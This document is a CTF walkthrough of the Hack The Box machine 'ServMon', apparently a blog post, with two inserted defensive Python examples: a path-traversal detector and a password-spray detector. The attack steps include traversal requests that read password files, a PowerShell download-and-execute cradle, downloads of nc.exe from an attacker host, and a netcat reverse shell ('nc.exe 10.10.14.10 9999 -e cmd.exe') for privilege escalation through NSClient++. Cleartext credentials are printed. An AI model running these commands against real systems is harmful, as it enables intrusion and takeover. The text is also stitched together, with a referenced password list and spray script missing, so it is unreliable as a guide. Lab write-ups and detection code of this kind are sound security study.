Again, we start with nmap -sC -sV -Pn -p- -oA ./ServMon 10.10.10.184
We've got everything open on this one: FTP, SSH, HTTP, RPC, HTTPS on 8443 and a bunch more. Let's start with FTP. It looks like anonymous login is allowed, so let's see what goodies are accessible. There are 2 folders in Users (Nadine and Nathan) with 1 TXT file each. Get them.
The one on Nadine's folder says:
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
And Nathan's says:
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
That appears to be everything we can get from FTP. Let's take a look at the HTTP site, which is the NVMS-1000 CCTV/NVR style surveillance system. Don't bother trying default credentials; I already tried and failed. I can't seem to get anything working on HTTP. Let's jump to HTTPS and see if we have better luck. That appears to be NSClient++ (whatever that is). Let's searchsploit NVMS and see if something jumps out.
OK. We have some directory traversal possibilities here. The 47774.txt (also found here) basically says to intercept the main page HTTP GET request and change the target. Time to fire up Burp Suite. Intercept and send it to Repeater, change the GET string to "/../../../../../../../../../../../../windows/win.ini HTTP/1.1" and fire away.
Vulnerability Confirmed. The Confidential.txt file on Nadine's FTP folder says she put the passwords on Nathan's Desktop. So, let's try "GET"ting them. We change the GET string again, this time to:
GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
And we get the list of passwords on Nathan's Desktop.
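The traversal above works because the web server glues the request path onto its document root and honours every ".." segment. The following is an added example (my own code, not from the write-up, the NVMS-1000 product or the 47774 advisory) that shows the naive resolution beside a containment check that rejects it, and a small detector that flags the same requests in access logs. The document root, the log lines and the Common Log Format layout are constructed for the demo; only the two request paths are taken from the write-up.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed document root for the demonstration; the real NVMS-1000 layout is not shown in the write-up.
WEB_ROOT = "/srv/nvms/www"

# Request paths exactly as used in the write-up (the win.ini probe and the Passwords.txt read).
PROBE = "/../../../../../../../../../../../../windows/win.ini"
PASSWORDS = "/../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt"


def naive_resolve(web_root: str, url_path: str) -> str:
    """The bug class behind EDB 47774: the URL path is glued onto the document root and
    then normalised, so every '..' segment is honoured and the result can leave the root."""
    return posixpath.normpath(web_root + "/" + unquote(url_path).lstrip("/"))


def safe_resolve(web_root: str, url_path: str):
    """Decode once, normalise, then require the result to stay inside web_root.
    Returns the on-disk path, or None when the request would escape the root.
    The server must not URL-decode the path again after this check."""
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, unquote(url_path).lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


# Raw and single-URL-encoded forms of a '..' segment followed by a separator.
TRAVERSAL = re.compile(r"\.\.[\\/]|%2e%2e[\\/]|\.\.%2f|%2e%2e%2f", re.IGNORECASE)
# Common Log Format: client ident user [time] "METHOD path PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def flag_traversal(log_lines):
    """Return (client, path, status) for every access-log line whose request path carries
    a traversal sequence in either its raw or its URL-decoded form."""
    hits = []
    for line in log_lines:
        m = CLF.match(line)
        if not m:
            continue
        client, _method, path, status = m.groups()
        if TRAVERSAL.search(path) or TRAVERSAL.search(unquote(path)):
            hits.append((client, path, status))
    return hits


# Constructed access-log lines in Common Log Format (not real NVMS output).
SAMPLE_LOG = [
    '10.10.14.10 - - [11/Apr/2020:10:00:01 +0000] "GET ' + PROBE + ' HTTP/1.1" 200 92',
    '10.10.14.10 - - [11/Apr/2020:10:00:05 +0000] "GET /%2e%2e/%2e%2e/%2e%2e/Users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 120',
    '192.168.1.5 - - [11/Apr/2020:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '192.168.1.5 - - [11/Apr/2020:10:00:12 +0000] "GET /images/..%2flogo.png HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    print("naive:", naive_resolve(WEB_ROOT, PROBE))   # escapes the root
    print("safe: ", safe_resolve(WEB_ROOT, PROBE))    # None
    for hit in flag_traversal(SAMPLE_LOG):
        print("traversal attempt:", hit)
```

The containment check is what the NVMS server lacked: the 12 ".." segments collapse to "/windows/win.ini" under naive_resolve and are refused by safe_resolve, while a request such as "/images/..%2flogo.png" that still lands inside the root is allowed through after normalisation. The detector matches both the raw and the percent-encoded spelling so that the second sample line is caught too.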
The list is:
And we should be able to perform a password spray attack on... well, everything. To start, create a users.txt file with administrator, Nathan, and Nadine in it. Create a passwords.txt file with the list above in it. It's a little funky, but here's the quick and dirty bash script for it.
Notice when it got to Nadine % L1k3B1gBut7s@W0rk that it replied Account Name: Nadine, Authority Name: SERVMON. That's a successful connection. We just got Nadine's credentials. SSH with that and we've got ourselves a foothold. Now, you can use the ssh_login module in Metasploit located at auxiliary/scanner/ssh/ssh_login, but again, MSF makes us lazy! Moving on. Looking around on the box (and since we already know NVMS and NSClient++ are on this machine), I find the NSClient.ini file that, surprise, has another password of "ew2x6SsGTxjRwXOT". Unfortunately, it also shows that we can only access it from the localhost, which is not very helpful right now. Let's keep looking.
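From the blue-team side, the spray above leaves a very recognisable trace: one source address, wrong-password failures (Windows event 4625, SubStatus 0xC000006A) against several distinct accounts inside a short window, followed by a 4624 success for one of them. The following is an added example of that detection logic, written by me for this page rather than taken from the write-up or from any product. The events are constructed to mirror the users.txt list and a made-up four-password list; the event fields are a simplified flat form of the Security-log attributes, not real EVTX parsing.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def _ev(event_id, time, ip, user, substatus=None):
    """Constructed, simplified Security-log event: 4625 = failed logon, 4624 = successful logon.
    SubStatus 0xC000006A means 'wrong password', the code a spray with valid usernames produces."""
    return {"id": event_id, "time": datetime.fromisoformat(time), "ip": ip,
            "user": user, "substatus": substatus}


USERS = ["administrator", "Nathan", "Nadine"]   # the users.txt list from the write-up
N_PASSWORDS = 4                                  # constructed: four candidates per account

EVENTS = []
t = datetime.fromisoformat("2020-04-11T10:00:00")
for user in USERS:                               # every password against one account, then the next
    for _ in range(N_PASSWORDS):
        EVENTS.append(_ev(4625, t.isoformat(), "10.10.14.10", user, "0xC000006A"))
        t += timedelta(seconds=2)
EVENTS.append(_ev(4624, t.isoformat(), "10.10.14.10", "Nadine"))    # the hit
EVENTS += [                                                          # benign noise: one user mistyping twice
    _ev(4625, "2020-04-11T10:05:00", "192.168.1.5", "bob", "0xC000006A"),
    _ev(4625, "2020-04-11T10:05:07", "192.168.1.5", "bob", "0xC000006A"),
]


def detect_spray(events, window=timedelta(minutes=10), min_accounts=3):
    """Flag a source address that fails a wrong-password logon against at least `min_accounts`
    distinct usernames inside `window`, and list any account it then logged into successfully."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["time"])
        fails = [e for e in evs if e["id"] == 4625 and e["substatus"] == "0xC000006A"]
        for i, start in enumerate(fails):
            in_window = [e for e in fails[i:] if e["time"] - start["time"] <= window]
            accounts = sorted({e["user"] for e in in_window}, key=str.lower)
            if len(accounts) >= min_accounts:
                later_success = sorted({e["user"] for e in evs
                                        if e["id"] == 4624 and e["time"] >= start["time"]},
                                       key=str.lower)
                alerts.append({"ip": ip, "first_seen": start["time"], "accounts": accounts,
                               "attempts": len(in_window), "later_success": later_success})
                break   # one alert per source; do not re-report every overlapping sub-window
    return alerts


if __name__ == "__main__":
    for a in detect_spray(EVENTS):
        print(f"{a['ip']}: {a['attempts']} wrong-password failures across {a['accounts']} "
              f"from {a['first_seen']}, later success for {a['later_success']}")
```

The threshold of three distinct accounts is deliberately low to match the tiny user list here; on a real domain you would raise it and also watch the 0xC0000064 (no such user) SubStatus, which shows up when the sprayed list contains guessed names. The benign source with two failures for a single account never trips the rule.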
What version of NSClient is running?
nadine@SERVMON C:\Program Files\NSClient++>nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64
OH! Now we're getting somewhere! There is a privilege escalation path with NSClient++ version 0.5.2.35 located here. Obviously, we don't want to reboot the system like the exploit states, but we will need to restart the service. Let's see if we can do that. Performing a little bit of Google Fu, we can find https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/ which has a nice PowerShell script that will do it for us. We just need to get it to the target. We do that using the Msxml2.XMLHTTP COM object.
$ex=New-Object -ComObject Msxml2.XMLHTTP;$ex.open('GET','http://10.10.14.10/ACL-View.ps1',$false);$ex.send();iex $ex.responseText
and then running it with
Get-Service nscp | fl *
And with CanStop set to True, that means we CAN restart the service. We need to see that 8443 page, but only localhost can reach it, so let's try an SSH tunnel.
ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184
Then we should be able to log in with the password found in the INI file on the https://localhost:8443 page.
Now we just follow the directions from the ExploitDB page. I change to the Temp directory and get Netcat over to the box.
Next, create the bat:
C:\Temp\nc.exe 10.10.14.10 9999 -e cmd.exe
and move it to the target the same way.
PS C:\Temp> $WebClient = New-Object System.Net.WebClient
PS C:\Temp> $WebClient.DownloadFile("http://10.10.14.10/nc.exe","C:\Temp\nc.exe")
PS C:\Temp> $WebClient.DownloadFile("http://10.10.14.10/exploited.bat","C:\Temp\exploited.bat")
After verifying that Netcat and our malicious bat file are in place, restart the NSCP service.
Now, go to the Client webpage, Navigate to Settings > External Scripts > Scripts and hit Add New
In Section, give it a name (I used shell), in Key put "command", and in Value set the path to our batch file.
Once you add it, the Changes button at the top will change to red. Select it and hit Save Configuration.
Now that you have it added, restart the NSCP service with:
sc.exe stop nscp
sc.exe start nscp
Once it has restarted, start a netcat listener (nc -lvnp 9999), sign back into the NSClient Page and go to Console. Under the logs is an input box. Type in the name of the script you added (in my case shell) and hit Run. Check your Netcat listener. Administrator Shell.